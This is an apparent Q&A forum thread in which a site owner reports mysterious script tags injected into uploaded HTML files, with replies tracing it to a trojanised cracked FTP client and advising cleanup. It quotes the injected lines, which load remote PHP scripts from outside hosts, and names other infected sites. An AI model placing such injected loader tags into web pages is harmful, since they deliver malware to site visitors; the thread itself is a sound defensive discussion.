# Weird script reference injection in my htmls

Tags: html, windows, ftp, virus

One friend is uploading *flash* files to my server with all the *html package* that the Flash CS6 editor suggests in its *export* command.

Well, despite all the Flash discussion and so, the problem is that eventually a very weird script references appear into the *head* element:

```
<!--339810--><script type="text/javascript">var gwloaded = false;</script>
<script src="http://techmounting.com.au/KsEsFOFC.php" type="text/javascript"></script><!--/339810-->
```

This script reference is not in the original *html* file.. this smells a virus, but I don't find any reference in the whole google.. I don't know if is a virus in my friend's computer or in my server or what.

Any idea?

#### Another examples (not in my server)

*http://www.iu-jaen.es* (no visit with browser)

*http://www.alliedcarehomehealth.com* (no visit with browser)

```
<script type="text/javascript">var gwloaded = false;</script>
<script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>
```

Comment: I think we detected how the attack was done, my friend was using a "cracked" version of a FTP windows client. Looks like the _crack_ was including some kind of trojan. The _black hackers_ took the passwords from this ftp user and they were modifying the html files they had access to. Fixing the html files was not a solution because the files were modified again within a few days. Changing the ftp client, and the ftp password solved the issue.

Answer (score 1, accepted):

Your web server has been compromised. TL;DR your website will display a content blocking interstitial to visiting users, which will direct them towards a suspicious binary download. The cause of the security breach is unclear, but I would take the normal precautions: reset relevant passwords, look for suspicious code snippets on PHP/javascript files.

Google also has a nice overview for some steps you can take to clean up your site (update third party plugins, change PWs, etc.):

https://support.google.com/webmasters/answer/163634

See this security posting from WebSense for a summary of the behavior of this attack:

http://community.websense.com/blogs/securitylabs/archive/tags/Mass+Injection/default.aspx

Comment: Consider adding the information provided in the blog post directly in your answer to avoid broken links later. Thanks and welcome to SO !